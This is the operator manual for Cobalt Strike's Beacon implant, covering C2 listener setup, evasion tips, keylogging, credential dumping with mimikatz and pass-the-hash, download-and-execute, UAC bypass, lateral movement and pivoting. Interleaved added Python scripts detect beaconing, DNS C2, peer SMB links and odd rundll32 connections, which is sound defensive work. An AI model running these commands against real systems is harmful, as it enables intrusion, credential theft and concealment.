Beacon is Cobalt Strike's payload to model advanced attackers. Use Beacon to egress a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling peer-to-peer Beacons over Windows named pipes.
Like Meterpreter, you may deliver Beacon, directly into memory, with a Metasploit Framework exploit or a Cobalt Strike attack.
Beacon is flexible and supports asynchronous and interactive communication. Asynchronous communication is low and slow. Beacon will phone home, download its tasks, and go to sleep. Interactive communication happens in real-time. In this mode, Beacon becomes a pivot for the Metasploit Framework and Meterpreter.
Beacon's network indicators are malleable. Redefine Beacon's communication with Cobalt Strike's malleable C2 language. This allows you to cloak Beacon activity to look like other malware or blend-in as legitimate traffic.
To use Beacon, you must start a Beacon listener. Go to Cobalt Strike -> Listeners. Press Add.
The Port field specifies the port Beacon will use for its HTTP or HTTPS traffic. The DNS Beacon will always start a DNS server on port 53.
windows/beacon_http/reverse_http is Cobalt Strike's HTTP beacon. This beacon will check for tasks and download them over HTTP. Once you press Save, Cobalt Strike will ask you to provide a list of domains to beacon to. Create DNS A records that point to your Cobalt Strike IP address. If you do not control any domains (shame on you!), provide your IP address in this box.
windows/beacon_https/reverse_https is Cobalt Strike's HTTPS Beacon. This variant of Beacon will SSL encrypt its communication.
Hybrid HTTP and DNS Beacon
windows/beacon_dns/reverse_http is Cobalt Strike's Hybrid HTTP and DNS beacon. This beacon will use DNS to check if tasks are available. If no tasks are available, it will go back to sleep. The Hybrid HTTP and DNS Beacon may use HTTP or DNS as a data channel to get tasks and send output to you.
Once you press Save, Cobalt Strike will ask you to provide a list of domains to beacon to. Create DNS NS records for these domains that point to your Cobalt Strike IP address. You must make Cobalt Strike authoritative for these domains.
To test your DNS configuration, open a terminal and type nslookup jibberish.beacon.domain. If you get an A record reply of 0.0.0.0, your DNS is correctly set up. If you do not get a reply, your DNS configuration is not correct and the Hybrid HTTP and DNS Beacon will not communicate with you.
Make sure your DNS records reference the primary address on your network interface. Cobalt Strike's DNS server will always send responses from your network interface's primary address. DNS resolvers tend to drop replies when they request information from one server, but receive a reply from another.
If you are behind a NAT device, make sure you use your public IP address for the NS record and set your firewall to forward UDP traffic on port 53 to your system. Cobalt Strike includes a DNS server to control Beacon.
If Beacon does not connect to you, go to Cobalt Strike -> Listeners. Review the domains and IP addresses it's calling back to. Cobalt Strike will not update the beacon host list if your IP address changes.
windows/beacon_smb/bind_pipe is Cobalt Strike's SMB Beacon. The SMB Beacon uses named pipes to communicate through a parent Beacon. This peer-to-peer communication works with Beacons on the same host. It also works across the network. Windows encapsulates named pipe communication within the SMB protocol. Hence the name, SMB Beacon.
You may use the SMB Beacon as a target listener for most of Beacon's features. The features that affect the local host will stage over a TCP connection that's set up to avoid the ire of the local host-based firewall. Beacon's lateral movement features will stage the SMB Beacon over a named pipe.
You may also export a stageless SMB Beacon executable or DLL. Go to Attacks -> Packages -> Windows Executable (S) and select SMB Beacon.
An HTTP or DNS Beacon may become an SMB Beacon. Use mode smb to make this change happen. Once a Beacon becomes an SMB Beacon, there is no way to make it beacon over HTTP or DNS again. If you'd like to kill an SMB Beacon, use the exit command. If you'd like to make the host beacon over HTTP or DNS, task the SMB Beacon to give you another Beacon session.
Cobalt Strike Attacks
You may use Beacon with all of Cobalt Strike's attack packages. Create a Beacon listener once and this listener will show up when you setup a Cobalt Strike attack package.
If you setup a DNS Beacon listener, some Cobalt Strike packages will give you two listener options. The first option, listed as listener name, will stage Beacon over HTTP with a Cobalt Strike-specific stager. This HTTP stager is fast and passes through many proxy configurations.
The second option, listed as listener name (DNS), will stage Beacon over the DNS protocol with a Cobalt Strike-specific stager. The DNS stager is valuable for tough egress situations, but you should use it only when the normal stager is not an option. The DNS stager will generate a lot of DNS requests and it's not as fast as the normal stager. The DNS stager is available for use with Cobalt Strike's social engineering packages.
You may deliver Beacon with a Metasploit® Framework exploit. Double-click the PAYLOAD option in a module launcher dialog and choose your Beacon listener. Cobalt Strike will configure the module for you.
You may also use Beacon from a Metasploit® Framework console tab. Beacon's C&C server is compatible with the Metasploit® Framework's stagers for Meterpreter. To stage HTTP or DNS Beacon, specify windows/meterpreter/reverse_http as your payload. To stage HTTPS Beacon, specify windows/meterpreter/reverse_https as your payload. Set LHOST to your Cobalt Strike system's IP address, and set LPORT to the port your Beacon web server is listening on.
Managing Beacon Sessions
Cobalt Strike treats a Beacon session differently from a Meterpreter session. Hosts infected with Beacon will not turn red with lightning bolts indicating access. To view and manage your Beacon sessions, go to View -> Beacons.
In this tab, Cobalt Strike shows your active Beacons. You will see the external IP address of the Beacon, the internal IP address, when the Beacon last called home, and other information. A * next to the user indicates that the Beacon has administrator privileges.
If you use the Hybrid HTTP and DNS beacon, be aware that Cobalt Strike will not know anything about a host until it checks in for the first time. If you see an entry with a last call time and that's it, you will need to give that Beacon its first task to see more information.
Press Remove to remove a beacon. If the beacon calls home again, it will show up again. Use the Remove button to get rid of stale beacons.
Highlight one or more Beacons and right-click to choose from common post-exploitation options:
Use Message to task Beacon to post a message to the desktop. This is a silly command, but it has its uses. Again, Beacon must reside in a process associated with the desktop you want to post to.
Try Set Note... to assign a note to your Beacon. These notes exist to help you manage Beacons as you see fit. This information is immediately available to your teammates. The note does not persist when you shut down Cobalt Strike.
Use Sleep to change Beacon's sleep time. Beacon will wait however long you specify between check ins. A higher sleep time makes Beacon harder to catch.
Select Spawn to ask Beacon to spawn a session for you. The Spawn dialog will show listeners from all of the Cobalt Strike team servers you're connected to. This is a simple way to send sessions to another server dedicated to noisy post-exploitation activity.
Use Task URL to ask Beacon to download a file and execute it. This is a great way to quickly deploy another remote administration tool (e.g., DarkComet) to several systems at once.
The Upload menu will upload a file to the target system through Beacon.
Use Clear to quickly clear Beacon's command queue. This is useful if you or someone on your team makes a mistake.
Kill will task Beacon to exit.
The Beacon Manager exposes only some of Beacon's functionality. To take advantage of Beacon, you must use the Beacon console. To open a Beacon console, highlight a Beacon, and press Interact.
The Beacon console allows you to see which tasks were issued to a Beacon and to see when it downloads them. The Beacon console is also where all command output, logged keystrokes, and other information will appear.
Type help in the Beacon console to see available commands. Type help followed by the command name to get more detailed help. Tab completion is available in the Beacon console as well.
Use the sleep command to specify Beacon's sleep time in seconds. By default, Beacon's sleep time has no variance built in. If you'd like the sleep times to vary, specify a jitter percentage after the sleep time. For example, sleep 300 20 will force Beacon to sleep for 300 seconds with a 20% jitter percentage. This means Beacon will sleep for a random value between 240s and 300s after each check-in.
Use sleep 0 to make Beacon check in multiple times a second. This is interactive mode.
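The sleep and jitter arithmetic above produces a recognisable rhythm on the wire. The following is an added example written from the defender's side; it is not code from this manual or from Cobalt Strike. The first function computes the interval window for sleep N J exactly as described (sleep 300 20 gives 240 to 300 seconds); the rest reads a constructed web-proxy log and flags client/host pairs whose requests recur at near-constant intervals. The log format, addresses, hostnames and thresholds are all assumptions made for the sample.

```python
"""Added example, not Cobalt Strike's own code: model the sleep/jitter window
the manual describes and flag hosts whose requests to one site recur at
near-constant intervals in a constructed web-proxy log."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlparse


def sleep_window(sleep_seconds, jitter_percent):
    """Interval bounds for `sleep N J`: jitter shortens the wait by up to
    J% of N, so `sleep 300 20` yields 240..300 seconds."""
    shortest = sleep_seconds - sleep_seconds * jitter_percent / 100
    return (float(shortest), float(sleep_seconds))


def consistent_with(intervals, sleep_seconds, jitter_percent):
    """True if every observed interval falls inside the sleep/jitter window."""
    low, high = sleep_window(sleep_seconds, jitter_percent)
    return all(low <= gap <= high for gap in intervals)


# Constructed proxy log (assumed format): "<timestamp> <client> <method> <url> <status>".
# 10.0.0.5 polls one URL every 245..300 s; 10.0.0.7 browses irregularly.
PROXY_LOG = """\
2024-05-01T09:00:00 10.0.0.5 GET http://cdn.example.test/updates.rss 200
2024-05-01T09:05:00 10.0.0.5 GET http://cdn.example.test/updates.rss 200
2024-05-01T09:09:15 10.0.0.5 GET http://cdn.example.test/updates.rss 200
2024-05-01T09:13:55 10.0.0.5 GET http://cdn.example.test/updates.rss 200
2024-05-01T09:18:00 10.0.0.5 GET http://cdn.example.test/updates.rss 200
2024-05-01T09:22:50 10.0.0.5 GET http://cdn.example.test/updates.rss 200
2024-05-01T09:00:03 10.0.0.7 GET http://news.example.test/ 200
2024-05-01T09:00:15 10.0.0.7 GET http://news.example.test/story 200
2024-05-01T09:15:00 10.0.0.7 GET http://news.example.test/ 200
2024-05-01T09:15:05 10.0.0.7 GET http://news.example.test/story2 200
2024-05-01T09:50:00 10.0.0.7 GET http://news.example.test/ 200
"""


def intervals_by_pair(log_text):
    """Seconds between successive requests, per (client, destination host)."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, _status = line.split()
        times[(client, urlparse(url).hostname)].append(datetime.fromisoformat(ts))
    gaps = {}
    for key, stamps in times.items():
        stamps.sort()
        gaps[key] = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    return gaps


def find_beaconing(log_text, min_requests=5, max_cv=0.25):
    """Flag pairs with enough requests whose inter-arrival times have a low
    coefficient of variation (std dev / mean). A 20% jitter keeps the CV well
    under 0.1, so it does not hide the rhythm from this test."""
    flagged = {}
    for key, gaps in intervals_by_pair(log_text).items():
        if not gaps or len(gaps) + 1 < min_requests:
            continue
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            flagged[key] = {"requests": len(gaps) + 1, "mean_interval": avg, "cv": cv}
    return flagged


if __name__ == "__main__":
    for (client, host), info in find_beaconing(PROXY_LOG).items():
        print(f"{client} -> {host}: {info['requests']} requests, "
              f"mean gap {info['mean_interval']:.0f}s, cv {info['cv']:.2f}")
```

Longer sleep times need a proportionally longer observation window before min_requests is reached; that is the trade-off behind the manual's remark that a higher sleep time makes Beacon harder to catch.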
The Hybrid HTTP and DNS Beacon uses HTTP as a data channel by default. If you're using this form of Beacon, you may ask Beacon to download tasks and send output over the DNS protocol.
Type mode dns to ask Beacon to download tasks with DNS A records. Use mode dns-txt to ask Beacon to get tasks with DNS TXT records. DNS TXT records carry 189 bytes of data per request versus 4 bytes for an A record request. DNS A record requests are more common in network traffic.
Use mode http to signal Beacon to download tasks and send output with the HTTP protocol again. You may change between data channels as needed while using the Hybrid HTTP and DNS Beacon.
The mode dns and mode dns-txt commands have no effect on the HTTP Beacon.
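The DNS behaviour described in the sections above (the idle 0.0.0.0 A-record reply, and the 4-byte A versus 189-byte TXT data channels) gives a resolver-log reviewer something concrete to look for. The following is an added example from the defender's side, not code from this manual or from Cobalt Strike: it summarizes a constructed DNS log per parent domain, counts 0.0.0.0 A replies, unique subdomains and TXT lookups, and uses the per-request figures from the manual to bound how much data the observed query volume could have carried. The log format, domain names, the two-label parent-domain approximation and the thresholds are assumptions made for the sample.

```python
"""Added example, not Cobalt Strike's own code: summarize constructed DNS
resolver logs for the traits the manual attributes to the Hybrid HTTP and
DNS Beacon: idle A-record replies of 0.0.0.0 and many unique subdomains or
TXT lookups under one domain."""
from collections import defaultdict

# Payload per request for each DNS data channel, as the manual states.
BYTES_PER_REQUEST = {"A": 4, "TXT": 189}

# Constructed log lines (assumed format): "<timestamp> <client> <qname> <qtype> <answer>".
DNS_LOG = """\
2024-05-01T09:00:00 10.0.0.5 a1b2c3d4.beacon-c2.test A 0.0.0.0
2024-05-01T09:01:00 10.0.0.5 e5f6a7b8.beacon-c2.test A 0.0.0.0
2024-05-01T09:02:00 10.0.0.5 c9d0e1f2.beacon-c2.test A 0.0.0.0
2024-05-01T09:03:00 10.0.0.5 0a1b2c3d.beacon-c2.test A 0.0.0.0
2024-05-01T09:04:00 10.0.0.5 4e5f6a7b.beacon-c2.test A 0.0.0.0
2024-05-01T09:04:01 10.0.0.5 api.8c9d0e1f.beacon-c2.test TXT "SGVsbG8gd29ybGQ="
2024-05-01T09:00:20 10.0.0.7 www.example.org A 198.51.100.10
2024-05-01T09:00:21 10.0.0.7 mail.example.org A 198.51.100.20
2024-05-01T09:00:30 10.0.0.7 www.example.org A 198.51.100.10
"""


def parent_domain(qname, labels=2):
    """Approximate the registered domain by its last `labels` labels
    (assumption: adequate for the sample; use a public-suffix list on real data)."""
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-labels:])


def summarize(log_text):
    """Per parent domain: query count, unique names, 0.0.0.0 A replies, TXT
    count, distinct clients, and the most data the traffic could have carried."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "zero_answers": 0,
                                 "txt": 0, "clients": set(), "max_bytes": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, qtype, answer = line.split(maxsplit=4)
        d = stats[parent_domain(qname)]
        d["queries"] += 1
        d["names"].add(qname)
        d["clients"].add(client)
        if qtype == "TXT":
            d["txt"] += 1
        if qtype == "A" and answer == "0.0.0.0":
            d["zero_answers"] += 1
        d["max_bytes"] += BYTES_PER_REQUEST.get(qtype, 0)
    return stats


def suspicious_domains(log_text, min_unique=5, min_zero=3):
    """Return domains with repeated idle replies or many unique subdomains.
    TXT lookups are only reported alongside another reason, since TXT
    queries on their own (SPF, DKIM, verification records) are routine."""
    out = {}
    for domain, d in summarize(log_text).items():
        reasons = []
        if d["zero_answers"] >= min_zero:
            reasons.append("repeated 0.0.0.0 A replies (idle check-in pattern)")
        if len(d["names"]) >= min_unique:
            reasons.append("many unique subdomains")
        if reasons and d["txt"]:
            reasons.append("TXT lookups alongside the above (wider data channel)")
        if reasons:
            out[domain] = {"reasons": reasons, "unique": len(d["names"]),
                           "zero_answers": d["zero_answers"],
                           "clients": sorted(d["clients"]), "max_bytes": d["max_bytes"]}
    return out


if __name__ == "__main__":
    for domain, info in suspicious_domains(DNS_LOG).items():
        print(domain, info)
```

The max_bytes figure is an upper bound, not a measurement: it assumes every request carried a full payload, which is exactly why the manual warns that a DNS A-record channel is slow and noisy compared with TXT or HTTP.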
Peer-to-Peer Command and Control
The SMB Beacon is designed for peer-to-peer communication with other Beacons. To gain control of it, another Beacon must link to it.
Linking and Unlinking
Use link [ip address] to link the current Beacon to an SMB Beacon that is waiting for a connection. When the current Beacon checks in, its linked peers will check in too.
To blend in with normal traffic, linked Beacons use Windows named pipes to communicate. This traffic is encapsulated in the SMB protocol. There are a few caveats to this approach:
- Hosts with a Beacon peer must accept connections on port 445.
- You may only link Beacons managed by the same Cobalt Strike instance.
If you get an error 5 (access denied) after you try to link to a Beacon: steal a domain user's token or use shell net use \\host /U:DOMAIN\user password to establish a session with the host. An administrator user is not required for this. Any valid domain user will do. Once you have a session, try to link to the Beacon again.
To destroy a Beacon link use unlink [ip address] in the parent or child. Later, you may link to the unlinked Beacon again (or link to it from another Beacon).
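The caveat above, that a host with a Beacon peer must accept connections on port 445, is also the defender's handle on this traffic: ordinary clients talk SMB to file servers and domain controllers, not to one another. The following is an added example from the defender's side, not code from this manual or from Cobalt Strike. It reads constructed flow records and reports workstation-to-workstation TCP 445 connections, excluding known SMB servers. The flow format, the workstation subnet and the server list are assumptions made for the sample.

```python
"""Added example, not Cobalt Strike's own code: find workstation-to-workstation
SMB (TCP 445) connections in constructed flow records. Peer-to-peer Beacons
need exactly that path open, while ordinary clients mostly talk SMB to servers."""
import ipaddress
from collections import defaultdict

WORKSTATIONS = ipaddress.ip_network("10.0.1.0/24")   # assumed client subnet
SMB_SERVERS = {ipaddress.ip_address("10.0.0.10")}     # assumed file server / DC

# Constructed flow records (assumed format): "<timestamp> <src> <dst> <dport>".
FLOWS = """\
2024-05-01T09:00:00 10.0.1.15 10.0.1.22 445
2024-05-01T09:00:30 10.0.1.15 10.0.0.10 445
2024-05-01T09:01:00 10.0.1.15 10.0.1.22 445
2024-05-01T09:01:10 10.0.1.40 10.0.1.22 445
2024-05-01T09:02:00 10.0.1.22 203.0.113.9 443
"""


def peer_smb_connections(flow_text, workstations=WORKSTATIONS, servers=SMB_SERVERS):
    """Unique (src, dst) pairs where one workstation opened SMB to another."""
    pairs = set()
    for line in flow_text.splitlines():
        if not line.strip():
            continue
        _ts, src, dst, dport = line.split()
        if int(dport) != 445:
            continue
        s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if d in servers:
            continue  # normal file-share traffic
        if s in workstations and d in workstations:
            pairs.add((src, dst))
    return sorted(pairs)


def inbound_peer_counts(flow_text, **kw):
    """How many distinct workstations connected to each peer over SMB; a host
    accepting links from several peers stands out."""
    counts = defaultdict(int)
    for _src, dst in peer_smb_connections(flow_text, **kw):
        counts[dst] += 1
    return dict(counts)


if __name__ == "__main__":
    for src, dst in peer_smb_connections(FLOWS):
        print(f"workstation-to-workstation SMB: {src} -> {dst}")
    print(inbound_peer_counts(FLOWS))
```

Where workstations legitimately share printers or folders with each other, feed those pairs into the servers set rather than loosening the rule; the value of the check is that the remaining list is short.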
Post Exploitation with Beacon
Beacon's shell command will send a task to execute a command via cmd.exe on the compromised host. When the command completes, Beacon will present the output to you. Use the execute command to execute a command without cmd.exe and without posting output to you.
Use the powershell command to execute a command with PowerShell on the compromised host. The powershell-import command will import a PowerShell script into Beacon. Future uses of the powershell command will have cmdlets from the imported script available to them. Beacon will only hold one PowerShell script at a time.
If you want Beacon to execute commands from a specific directory, use the cd command in the Beacon console to switch the working directory of the Beacon's process.
Beacon's keystroke logger injects into the process you choose and reports keystrokes back to you. Use keylogger pid to inject into an x86 process. Use keylogger pid x64 to inject into an x64 process. explorer.exe is usually a good candidate.
You will receive keystrokes when Beacon checks in. If you're using the Hybrid HTTP and DNS Beacon, use checkin to force Beacon to connect to you and provide captured keystrokes.
Beware that multiple keystroke loggers may conflict with each other. Use only one keystroke logger per desktop session.
Manage Post-Exploitation Jobs
Beacon treats each shell, powershell, and keystroke logger instance as a job. These jobs run in the background and report their output when it's available. Use the jobs command to see which jobs are running in your Beacon. Use jobkill to kill a job.
Type spawn followed by a listener name to task Beacon to spawn a session for a listener. This command is the same as the right-click Spawn menu item.
By default, the spawn command will spawn a session in rundll32.exe. An alert administrator may find it strange that rundll32.exe is periodically making connections to the internet. Find a better program (e.g., Internet Explorer) and use the spawnto command to state which program Beacon should spawn sessions into.
The spawnto command expects the full path to the program. Type spawnto by itself and press enter to instruct Beacon to go back to its default behavior.
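The observation above, that an alert administrator would find it strange for rundll32.exe to periodically reach the internet, is worth turning into a check. The following is an added example from the defender's side, not code from this manual or from Cobalt Strike. It reads constructed Sysmon-style network-connection records (Event ID 3 as JSON lines) and reports processes that initiated connections to external addresses but are not on a short allow-list of programs expected to do so; rundll32.exe is called out explicitly, and any other unlisted image is reported as well, since spawnto lets an operator pick a different host program. The record format, the allow-list, the internal address ranges and the sample values are assumptions made for the example.

```python
"""Added example, not Cobalt Strike's own code: scan constructed Sysmon-style
network-connection records (Event ID 3, JSON lines) for processes that have
no ordinary reason to reach external addresses, rundll32.exe first among them."""
import ipaddress
import json
import ntpath

# Assumed allow-list of images expected to initiate connections to external hosts.
EXPECTED_INTERNET_IMAGES = {"iexplore.exe", "chrome.exe", "msedge.exe", "firefox.exe", "svchost.exe"}

# Assumed internal ranges; the documentation/test ranges used below (203.0.113.0/24,
# 198.51.100.0/24) therefore count as external for the sample.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in
                     ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                      "127.0.0.0/8", "169.254.0.0/16")]

# Constructed records. A raw string keeps the JSON-escaped backslashes intact.
EVENTS = r"""
{"EventID": 3, "Image": "C:\\Windows\\System32\\rundll32.exe", "ProcessId": 4120, "DestinationIp": "203.0.113.10", "DestinationPort": 80, "Initiated": true}
{"EventID": 3, "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "ProcessId": 2210, "DestinationIp": "203.0.113.10", "DestinationPort": 80, "Initiated": true}
{"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe", "ProcessId": 900, "DestinationIp": "10.0.0.10", "DestinationPort": 445, "Initiated": true}
{"EventID": 3, "Image": "C:\\Windows\\System32\\notepad.exe", "ProcessId": 5011, "DestinationIp": "198.51.100.7", "DestinationPort": 443, "Initiated": true}
{"EventID": 1, "Image": "C:\\Windows\\System32\\rundll32.exe", "ProcessId": 4120}
"""


def is_internal(ip_text):
    """True for addresses inside the assumed internal ranges."""
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETWORKS)


def odd_outbound_connections(events_text, expected=EXPECTED_INTERNET_IMAGES):
    """Report initiated connections to external addresses from images that
    should not be making them."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 3 or not ev.get("Initiated"):
            continue
        if is_internal(ev["DestinationIp"]):
            continue
        image = ntpath.basename(ev["Image"]).lower()
        if image == "rundll32.exe":
            reason = "rundll32.exe initiating an external connection"
        elif image not in expected:
            reason = "image not on the expected-internet allow-list"
        else:
            continue
        findings.append({"image": image, "pid": ev.get("ProcessId"),
                         "dest": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}',
                         "reason": reason})
    return findings


if __name__ == "__main__":
    for f in odd_outbound_connections(EVENTS):
        print(f"{f['image']} (pid {f['pid']}) -> {f['dest']}: {f['reason']}")
```

A browser that appears on the allow-list is not cleared by this check alone; pairing it with the periodic-interval analysis of proxy logs covers the case where the session was spawned into a program that is expected to be on the network.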
Type inject followed by a process id and a listener name to inject a session into a specific process. Use ps to get a list of processes on the current system.
The inject and spawn commands both inject a stager for the desired listener into memory. This stager tries to connect back to you to stage the requested payload into memory. If the stager cannot get past any egress restrictions or blocks that are in place, you will not get a session.
Upload and Download Files
The download command will download the requested file. You do not need to provide quotes around a filename with spaces in it. Beacon is built for low and slow exfil of data. Beacon will download 512KB of each file it's tasked to get after a check in.
To view files downloaded through Beacon, go to View -> Downloads in Cobalt Strike.
The upload command will upload a file to the host. Beacon is not able to upload files larger than 1MB.
Use the meterpreter command to request a Meterpreter session that tunnels its traffic through the current Beacon. When tunneling Meterpreter through Beacon, use sleep 0 to make Beacon check in several times each second.
Beacon will use the current data channel to stage Meterpreter. Meterpreter is big. If mode dns-txt is the data channel, it will take several minutes (over internet DNS infrastructure) to stage Meterpreter. Don't try to stage Meterpreter with mode dns as your data channel.
If HTTP is a viable egress option for you, type mode http before you issue the meterpreter command to use HTTP as a data channel. Once you have a Meterpreter session, you may use one of Beacon's other data channels to manage the Meterpreter session.
Use socks 8080 to set up a SOCKS4a proxy server on port 8080 (or any other port you choose). This will set up a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check in several times a second.
Beacon's HTTP data channel is the most responsive for pivoting purposes. If you'd like to pivot traffic over DNS, use the DNS TXT record communication mode.
You may use proxychains to tunnel external tools through Beacon.
Use socks stop to disable the SOCKS proxy server.
You may also tunnel Metasploit® Framework exploits and modules through Beacon. Create a Beacon SOCKS proxy [as described above] and then go to a Metasploit® Framework Console tab (View -> Console). Type:
setg Proxies socks4:127.0.0.1:8080
setg ReverseAllowProxy true
The setg Proxies command sets the Metasploit® Framework Proxies option for all modules executed from this point forward. This option forces the Metasploit® Framework to direct traffic through a SOCKS4 proxy on 127.0.0.1:8080. If you use a different port for Beacon, specify it in the option. Once you're done pivoting through Beacon in this way, use unsetg Proxies to stop this behavior.
Use the rportfwd command to setup a reverse pivot through Beacon. The rportfwd command will bind a port on the compromised target. Any connections to this port will cause your Cobalt Strike server to initiate a connection to another host and port and relay traffic between these two connections. Cobalt Strike tunnels this traffic through Beacon. The syntax for rportfwd is: rportfwd [bind port] [forward host] [forward port].
Use rportfwd stop [bind port] to disable the reverse port forward.
Use getsystem to impersonate a token for the SYSTEM account. This level of access may allow you to perform privileged actions that are not possible as an Administrator user.
Use runas [DOMAIN\user] [password] [command] to run a command as another user using their credentials. The runas command will not return any output. You may use runas from a non-privileged context though.
Use spawnas [DOMAIN\user] [password] [listener] to spawn a session as another user using their credentials. This command uses PowerShell to bootstrap a payload in memory.
Privilege Escalation (UAC Bypass)
Microsoft introduced User Account Control (UAC) in Windows Vista and refined it in Windows 7. UAC works a lot like sudo in UNIX. Day to day, a user works with normal privileges. When the user needs to perform a privileged action, the system asks if they would like to elevate their rights.
Use bypassuac [listener] to spawn a session in a process with elevated rights. This privilege escalation technique takes advantage of a loophole in the UAC default settings on Windows 7 and later. This command will not work if the current user is not in the Administrators group or if UAC is set to its highest setting. To check if the current user is in the Administrators group, use shell whoami /groups.
Beacon's UAC bypass will drop a DLL file to disk and remove the DLL when it's done. Beacon uses Cobalt Strike's Artifact Kit to generate an anti-virus safe DLL.
Credential and Hash Harvesting
Use the hashdump command to inject into LSASS and dump the password hashes for users on the current system. The wdigest command will use mimikatz to recover plaintext passwords for users who interactively logged on to the current system since the last reboot.
Beacon integrates mimikatz. Use the mimikatz command to pass any command to mimikatz's command dispatcher. For example, mimikatz standard::coffee will give you a cup of coffee. Beacon will take care to inject a mimikatz instance that matches the native architecture of your target. Some mimikatz commands must run as SYSTEM to work. Prefix a command with a ! to force mimikatz to elevate to SYSTEM before it runs your command. For example, mimikatz !lsa::cache will recover salted password hashes cached by the system.
When a user logs onto a Windows host, an access token is generated. This token contains information about the user and their rights. The access token also holds information needed to authenticate the user to another system on the same Active Directory domain. You may steal a token from another process and apply it to your Beacon. When you do this, you may interact with other systems on the domain as that user.
Use steal_token [process id] to impersonate a token from an existing process. If you'd like to see which processes are running use ps. The getuid command will print your current token. Use rev2self to revert back to your original token.
If you know credentials for a user, use make_token [DOMAIN\user] [password] to generate a token that passes these credentials. This token is a copy of your current token with modified single sign-on information. It will show your current username. This is expected behavior.
Use mimikatz to pass-the-hash with Beacon. The Beacon command mimikatz sekurlsa::pth /user:[user] /domain:[DOMAIN] /ntlm:[hash] /run:"powershell -w hidden" will create a process with a token setup to use the single sign-on information you provide. Use steal_token to take the token from this new process and you will inherit its single sign-on information.
Use kerberos_ticket_use [/path/to/ticket] to inject a Kerberos ticket into the current session. This will allow Beacon to interact with remote systems using the rights in this ticket. Try this with a Golden Ticket generated by mimikatz 2.0.
Use kerberos_ticket_purge to clear any kerberos tickets associated with your session.
Once you have a token for a domain admin or a domain user who is a local admin on a target, you may abuse this trust relationship to get control of the target. Cobalt Strike's Beacon has several built-in options for lateral movement.
Use Beacon's psexec [target] [share] [listener] to execute a payload on a remote host. This command will generate a Windows Service executable for your listener, copy it to the share you specify, create a service, start the service, and clean up after itself. Default shares include ADMIN$ and C$.
Use psexec_psh [target] [listener] to execute a payload on a remote host with PowerShell. This command will create a service to run a PowerShell one-liner, start it, and clean up after itself. This method of lateral movement is useful if you do not want to touch disk.
Beacon's winrm [target] [listener] command will use WinRM to execute a payload on a remote host. This option requires that WinRM is enabled on the target system. It's off by default. This option uses PowerShell to bootstrap your payload on target.
Finally, use wmi [target] [listener] to deliver a payload via Windows Management Instrumentation. This command uses PowerShell to bootstrap your payload on target.
Beacon has a few other commands not covered above.
The clear command will clear Beacon's task list. Use this if you make a mistake.
Use dllinject [pid] to inject a Reflective DLL into a process.
Type exit to ask Beacon to exit.
Use kill [pid] to terminate a process.
Use mkdir to make a folder. Use rm to delete a file or folder.
Use task [url] to ask Beacon to download a file from a URL and execute it.
Use timestomp to match the Modified, Accessed, and Created times of one file to those of another file.